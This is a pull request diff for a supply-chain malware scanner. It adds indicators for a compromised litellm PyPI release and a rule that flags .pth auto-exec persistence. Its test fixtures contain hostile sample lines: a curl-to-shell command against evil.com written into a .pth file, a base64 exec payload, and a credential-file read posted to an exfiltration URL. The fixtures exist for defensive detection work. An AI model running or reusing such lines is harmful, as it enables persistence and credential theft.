### PR TITLE
v2.10.14  LiteLLM/TeamPCP IOCs + .pth persistence

### DIFF
--- a/iocs/builtin.yaml
+++ b/iocs/builtin.yaml
@@ -206,6 +206,8 @@ files:
   # GlassWorm (mars 2026)
   - i.js
   - init.json
+  # LiteLLM/Checkmarx (mars 2026) — .pth = Python auto-exec persistence
+  - litellm_init.pth
 
 hashes:
   # Shai-Hulud v2 payloads

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.10.13",
+  "version": "2.10.14",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.10.13",
+      "version": "2.10.14",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.3.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.10.13",
+  "version": "2.10.14",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -690,6 +690,14 @@ const PLAYBOOKS = {
     'pour reecrire le malware a chaque execution, evitant la detection par signature. Moteur polymorphe. ' +
     'Verifier si Ollama est installe: curl http://localhost:11434/api/tags. ' +
     'Aucun package npm legitime n\'appelle un LLM local. Supprimer le package.',
+
+  pth_persistence:
+    'CRITIQUE: Ecriture d\'un fichier .pth detectee. Les fichiers .pth dans site-packages/ sont executes ' +
+    'automatiquement par Python au demarrage — c\'est un vecteur de persistence invisible. ' +
+    'Technique LiteLLM/Checkmarx (mars 2026): litellm_init.pth contient du code base64 qui installe un stealer ' +
+    'dans ~/.config/sysmon/ et exfiltre vers checkmarx.zone. ' +
+    'Verifier: find $(python -c "import site; print(site.getsitepackages()[0])") -name "*.pth" -exec cat {} \\; ' +
+    'Supprimer tout fichier .pth non standard. Rotation des credentials.',
 };
 
 function getPlaybook(threatType) {

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -1667,6 +1667,18 @@ const RULES = {
     ],
     mitre: 'T1543.002'
   },
+  pth_persistence: {
+    id: 'MUADDIB-AST-061',
+    name: 'Python .pth Auto-Exec Persistence',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Ecriture d\'un fichier .pth detectee. Les fichiers .pth dans site-packages/ sont executes automatiquement par l\'interpreteur Python au demarrage, sans import explicite. Technique de persistence LiteLLM/Checkmarx (litellm_init.pth) : le .pth contient du code Python base64-encode qui installe un stealer.',
+    references: [
+      'https://blog.pypi.org/posts/2026-03-24-litellm-compromise/',
+      'https://attack.mitre.org/techniques/T1546/004/'
+    ],
+    mitre: 'T1546.004'
+  },
   npm_token_steal: {
     id: 'MUADDIB-AST-060',
     name: 'NPM Token Extraction via CLI',

--- a/src/scanner/ast-detectors.js
+++ b/src/scanner/ast-detectors.js
@@ -1201,6 +1201,17 @@ function handleCallExpression(node, ctx) {
           file: ctx.relFile
         });
       }
+      // Detect writes to .pth files — Python auto-exec persistence (LiteLLM/Checkmarx T1546.004)
+      // .pth files in site-packages/ are executed automatically by the Python interpreter at startup.
+      // No legitimate npm package creates .pth files.
+      if (sdPathStr && /\.pth$/i.test(sdPathStr)) {
+        ctx.threats.push({
+          type: 'pth_persistence',
+          severity: 'CRITICAL',
+          message: `${sdWriteMethod}() writes to Python .pth file: "${sdPathStr.substring(0, 80)}" — auto-exec persistence technique (LiteLLM/Checkmarx).`,
+          file: ctx.relFile
+        });
+      }
     }
   }
 

--- a/src/scanner/dataflow.js
+++ b/src/scanner/dataflow.js
@@ -1000,7 +1000,8 @@ const SENSITIVE_PATH_PATTERNS = [
   '_cacache', '.cache/yarn', '.cache/pip',
   // P6: Removed discord, leveldb — data directories, not credential paths.
   // _cacache/.cache kept — real cache poisoning vectors (T1195.002).
-  '/proc/mem', '/proc/self'  // v2.10.11: runner secret extraction from process memory (TeamPCP Trivy stealer)
+  '/proc/mem', '/proc/self',  // v2.10.11: runner secret extraction from process memory (TeamPCP Trivy stealer)
+  '.config/sysmon'  // v2.10.13: LiteLLM/Checkmarx credential stealer staging path
 ];
 
 function isSensitivePath(val) {

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -157,11 +157,11 @@ jobs:
   });
 
   // 3.3b Rule count check
-  test('P3: rule count is 167 (162 RULES + 5 PARANOID)', () => {
+  test('P3: rule count is 168 (163 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 162, `Expected 162 RULES, got ${ruleCount}`);
+    assert(ruleCount === 163, `Expected 163 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 

--- a/tests/ioc/updater.test.js
+++ b/tests/ioc/updater.test.js
@@ -378,6 +378,27 @@ test('COMPACT: loadCachedIOCs works with compact fallback', () => {
   assert(Array.isArray(iocs.pypi_packages), 'Should have pypi_packages array');
 });
 
+test('COMPACT: litellm versioned IOC is present in compact data', () => {
+  const compactPath = path.join(__dirname, '..', '..', 'src', 'ioc', 'data', 'iocs-compact.json');
+  const compact = JSON.parse(fs.readFileSync(compactPath, 'utf8'));
+  assert(compact.pypi_versioned['litellm'], 'litellm should be in pypi_versioned');
+  assert(compact.pypi_versioned['litellm'].includes('1.82.7'), 'litellm should have version 1.82.7');
+  assert(compact.pypi_versioned['litellm'].includes('1.82.8'), 'litellm should have version 1.82.8');
+  assert(!compact.pypi_wildcards.includes('litellm'), 'litellm should NOT be in pypi_wildcards (versioned IOC)');
+});
+
+test('COMPACT: litellm IOC expands correctly via expandCompactIOCs', () => {
+  const { expandCompactIOCs } = require('../../src/ioc/updater.js');
+  const compactPath = path.join(__dirname, '..', '..', 'src', 'ioc', 'data', 'iocs-compact.json');
+  const compact = JSON.parse(fs.readFileSync(compactPath, 'utf8'));
+  const expanded = expandCompactIOCs(compact);
+  const litellmEntries = expanded.pypi_packages.filter(p => p.name === 'litellm');
+  assert(litellmEntries.length === 2, `Expected 2 litellm entries, got ${litellmEntries.length}`);
+  const versions = litellmEntries.map(e => e.version);
+  assert(versions.includes('1.82.7'), 'Should have litellm@1.82.7');
+  assert(versions.includes('1.82.8'), 'Should have litellm@1.82.8');
+});
+
 // ============================================
 // YAML LOADER TESTS
 // ============================================

--- a/tests/scanner/ast.test.js
+++ b/tests/scanner/ast.test.js
@@ -2719,6 +2719,45 @@ fetch('https://api.telegram.org/bot1234:ABCD/sendMessage', {
     } finally { cleanupTemp(tmp); }
   });
 
+  // === .pth persistence detection (LiteLLM/Checkmarx) ===
+
+  await asyncTest('AST: writeFileSync to .pth file → pth_persistence CRITICAL', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+fs.writeFileSync('/usr/lib/python3.11/site-packages/litellm_init.pth', 'import base64;exec(base64.b64decode("..."))');
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'pth_persistence');
+      assert(t, 'Should detect pth_persistence for writeFileSync to .pth file');
+      assert(t.severity === 'CRITICAL', `Expected CRITICAL, got ${t.severity}`);
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('AST: writeFileSync to .json file → NO pth_persistence', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+fs.writeFileSync('./config.json', '{"key": "value"}');
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'pth_persistence');
+      assert(!t, 'writeFileSync to .json should NOT trigger pth_persistence');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('AST: writeFile to arbitrary .pth path → pth_persistence CRITICAL', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+fs.writeFile('/tmp/evil.pth', 'import os; os.system("curl http://evil.com/s | sh")', () => {});
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'pth_persistence');
+      assert(t, 'Should detect pth_persistence for writeFile to any .pth path');
+    } finally { cleanupTemp(tmp); }
+  });
+
   await asyncTest('AST: fetch to trycloudflare.com → suspicious_domain MEDIUM', async () => {
     const tmp = makeTempPkg(`
 const https = require('https');

--- a/tests/scanner/dataflow.test.js
+++ b/tests/scanner/dataflow.test.js
@@ -947,6 +947,21 @@ fetch('https://logs.datadoghq.com/track');
     assert(isSDKPattern('KREA_SECRET', code) === true,
       'KREA_SECRET with krea.ai + CDN + logging should be SDK (R2 relaxed)');
   });
+  // === .config/sysmon sensitive path detection (LiteLLM/Checkmarx) ===
+
+  await asyncTest('DATAFLOW: Detects .config/sysmon readFileSync + fetch as suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const data = fs.readFileSync('/home/user/.config/sysmon/creds.json', 'utf8');
+fetch('https://checkmarx.zone/exfil', { method: 'POST', body: data });
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(t, 'readFileSync from .config/sysmon + fetch should trigger suspicious_dataflow');
+      assert(t.severity === 'CRITICAL', `Expected CRITICAL, got ${t.severity}`);
+    } finally { cleanupTemp(tmp); }
+  });
 }
 
 module.exports = { runDataflowTests };

--- a/vscode-extension/package.json
+++ b/vscode-extension/package.json
@@ -2,7 +2,7 @@
   "name": "muaddib-vscode",
   "displayName": "MUAD'DIB Security Scanner",
   "description": "Detecte les attaques supply chain npm et PyPI directement dans VS Code",
-  "version": "2.10.11",
+  "version": "2.10.12",
   "publisher": "dnszlsk",
   "engines": {
     "vscode": "^1.85.0"


### PR DESCRIPTION
P0: litellm 1.82.7/1.82.8 PyPI IOCs, .config/sysmon in sensitive paths. P1: .pth file persistence detection (CRITICAL AST-061), litellm_init.pth in file IOCs. 6 new tests, 2712 total, 0 fail.